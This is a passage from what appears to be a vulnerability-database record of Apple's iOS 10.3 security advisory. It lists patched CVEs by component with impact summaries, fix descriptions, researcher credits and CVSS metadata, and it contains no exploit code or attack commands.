Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and 
later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory 
management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of iOS 10.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", 
"CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029", "CVE-2017-6976"], "modified": "2017-03-27T00:00:00", "id": "APPLE:218B65DBD8E421B171C5CC7639BE893D", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:31", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. 
This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: 
iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian 
Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. 
This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. 
This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. 
This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and 
later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may 